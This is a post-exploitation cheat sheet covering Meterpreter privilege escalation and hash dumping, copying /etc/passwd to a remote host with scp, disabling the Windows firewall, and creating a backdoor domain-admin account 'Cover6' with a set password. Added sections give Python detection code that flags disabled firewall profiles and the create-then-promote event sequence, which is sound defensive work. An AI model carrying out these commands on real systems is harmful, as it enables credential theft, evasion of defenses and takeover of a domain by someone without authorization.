Post-Exploitation

Meterpreter

Meterpreter is an advanced payload that is part of the Metasploit Framework. It typically uses a reverse connection, so the compromised host calls back to the attacking machine. Meterpreter resides completely in the memory of the target machine and writes nothing to disk. It also does not spawn any new processes, but rather injects itself into an existing process. It communicates over an encrypted channel and offers the attacker several useful pentesting features, including a command shell, the ability to run executables, file send/receive, and network profiling.

Assuming you have a Meterpreter shell on a Windows host, you can use the following commands:

meterpreter > getsystem
meterpreter > getuid
meterpreter > run winenum
meterpreter > sysinfo
meterpreter > ipconfig
meterpreter > run get_local_subnet
meterpreter > enumdesktops
meterpreter > webcam_list
meterpreter > run post/windows/gather/smart_hashdump
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/enum_shares
meterpreter > run post/windows/gather/checkvm
meterpreter > background

Upon exploitation of a Linux host, the screen may be blank, but from here you can enter your standard Linux post-exploitation commands.

# ifconfig
# whoami
# netstat -antp
# scp /etc/passwd root@10.0.1.21:/root

Firewalls

C:> netsh advfirewall show rule name=all
C:> netsh advfirewall set allprofile state off
C:> netsh advfirewall set allprofile state on
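The `set allprofile state off` command above silently disables the host firewall on every profile, and `show rule name=all` is too verbose to review by hand. As an added defender-side example (not part of the original page), the following Python parses the output of `netsh advfirewall show allprofiles` and reports any profile whose State is not ON. The sample output embedded below is constructed to match the layout of that command, with the Public profile switched off as the page's command would do on all three.

```python
import re

# Constructed sample of `netsh advfirewall show allprofiles` output (not captured
# from a real host). The Public profile has been switched OFF.
SAMPLE_NETSH_OUTPUT = """
Domain Profile Settings:
----------------------------------------------------------------------
State                                 ON
Firewall Policy                       BlockInbound,AllowOutbound
LocalFirewallRules                    N/A (GPO-store only)

Private Profile Settings:
----------------------------------------------------------------------
State                                 ON
Firewall Policy                       BlockInbound,AllowOutbound

Public Profile Settings:
----------------------------------------------------------------------
State                                 OFF
Firewall Policy                       BlockInbound,AllowOutbound
Ok.
"""

# A profile block starts with "<Name> Profile Settings:" and its first "State" line
# carries the on/off value for that profile.
PROFILE_HEADER = re.compile(r"^(Domain|Private|Public) Profile Settings:\s*$")
STATE_LINE = re.compile(r"^State\s+(ON|OFF)\s*$", re.IGNORECASE)

EXPECTED_PROFILES = ("Domain", "Private", "Public")


def parse_profile_states(text):
    """Return {profile_name: 'ON' | 'OFF'} parsed from show allprofiles output."""
    states = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        header = PROFILE_HEADER.match(line)
        if header:
            current = header.group(1)
            continue
        state = STATE_LINE.match(line)
        if state and current:
            states[current] = state.group(1).upper()
            current = None  # only the first State line of each profile block counts
    return states


def disabled_profiles(text):
    """Profiles whose firewall state is OFF, or absent from the output entirely.

    A missing profile is treated as a finding too: partial output should not
    pass a posture check by default.
    """
    states = parse_profile_states(text)
    return sorted(p for p in EXPECTED_PROFILES if states.get(p) != "ON")


if __name__ == "__main__":
    for profile in disabled_profiles(SAMPLE_NETSH_OUTPUT):
        print(f"WARNING: Windows Firewall is not ON for the {profile} profile")
```

On a real host, feed the check the actual command output (for example from a scheduled job) and alert on a non-empty result. In the Security log, a change to a firewall setting is also recorded as event ID 4950 ("A Windows Firewall setting has changed"), which gives a second, log-based signal for the same action.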

Domain Enumeration

The following commands, with the proper privileges, allow for Windows domain enumeration.

C:> net users
C:> net user <username> /domain
C:> net user <username>
C:> net users /domain
C:> net groups /domain
C:> net groups "Domain Admins" /domain

Adding a user to the Domain

Upon successfully enumerating the system/network and acquiring domain administrator privileges, it is now time to add the user Cover6 with the password Cover6#C6S to the network/domain. The command to do this from a Windows host is:

C:> net user Cover6 Cover6#C6S /ADD /DOMAIN

Adding a user to the Domain Admins group

Upon successfully adding the user Cover6 to the domain, it is now time to add the user to the Domain Admins group. The command to do this from a Windows prompt is:

C:> net group "Domain Admins" Cover6 /ADD /DOMAIN
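The two `net user ... /ADD /DOMAIN` and `net group "Domain Admins" ... /ADD /DOMAIN` steps leave a very recognisable pair of records in the domain controller's Security log: event 4720 (a user account was created) followed shortly by event 4728 (a member was added to a security-enabled global group, which is what Domain Admins is). As an added detection example (not part of the original page), the Python below correlates those two events over a set of constructed event records and flags any account that is created and then placed in a privileged group within a short window. The field names follow the usual event data names (`TargetUserName`, `MemberName`, `SubjectUserName`); the events themselves are made up for the example.

```python
from datetime import datetime, timedelta

# Constructed Windows Security events for the example (not a real log export).
# 4720 = user account created; 4728 = member added to a security-enabled global group.
# In a 4728 event, TargetUserName is the group and MemberName is the member's DN.
SAMPLE_EVENTS = [
    {"EventID": 4624, "Time": "2024-01-15T09:00:00",
     "SubjectUserName": "jdoe", "TargetUserName": "jdoe"},
    {"EventID": 4720, "Time": "2024-01-15T10:02:11",
     "SubjectUserName": "admin.svc", "TargetUserName": "Cover6"},
    {"EventID": 4728, "Time": "2024-01-15T10:02:40",
     "SubjectUserName": "admin.svc",
     "MemberName": "CN=Cover6,CN=Users,DC=corp,DC=example",
     "TargetUserName": "Domain Admins"},
    {"EventID": 4720, "Time": "2024-01-15T11:30:00",
     "SubjectUserName": "hr.onboard", "TargetUserName": "new.hire"},
    {"EventID": 4728, "Time": "2024-01-16T08:15:00",
     "SubjectUserName": "hr.onboard",
     "MemberName": "CN=new.hire,CN=Users,DC=corp,DC=example",
     "TargetUserName": "Sales"},
]

# Groups whose membership changes should always be reviewed.
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators"}


def member_account(member_name):
    """Extract the account name from a DN such as CN=Cover6,CN=Users,...; otherwise return the raw value."""
    first = member_name.split(",", 1)[0]
    return first[3:] if first.upper().startswith("CN=") else first


def privileged_group_additions(events):
    """All 4728 events whose target group is in PRIVILEGED_GROUPS."""
    return [e for e in events
            if e["EventID"] == 4728 and e["TargetUserName"] in PRIVILEGED_GROUPS]


def created_then_privileged(events, window=timedelta(hours=1)):
    """Accounts created (4720) and added to a privileged group (4728) within `window`.

    Returns (account, group, actor) tuples. The window keeps routine onboarding
    (account created, group added much later) out of the high-severity result.
    """
    created_at = {}
    for e in events:
        if e["EventID"] == 4720:
            created_at[e["TargetUserName"].lower()] = datetime.fromisoformat(e["Time"])

    hits = []
    for e in privileged_group_additions(events):
        account = member_account(e["MemberName"])
        t_created = created_at.get(account.lower())
        if t_created is None:
            continue
        delta = datetime.fromisoformat(e["Time"]) - t_created
        if timedelta(0) <= delta <= window:
            hits.append((account, e["TargetUserName"], e["SubjectUserName"]))
    return hits


if __name__ == "__main__":
    for account, group, actor in created_then_privileged(SAMPLE_EVENTS):
        print(f"ALERT: {actor} created {account} and added it to {group} within the window")
```

Any 4728 into Domain Admins deserves a review on its own; the create-then-add correlation simply raises the severity of the exact sequence this page describes. Membership changes to local groups such as Administrators are logged as 4732, and universal groups as 4756, so a production rule should cover those IDs as well.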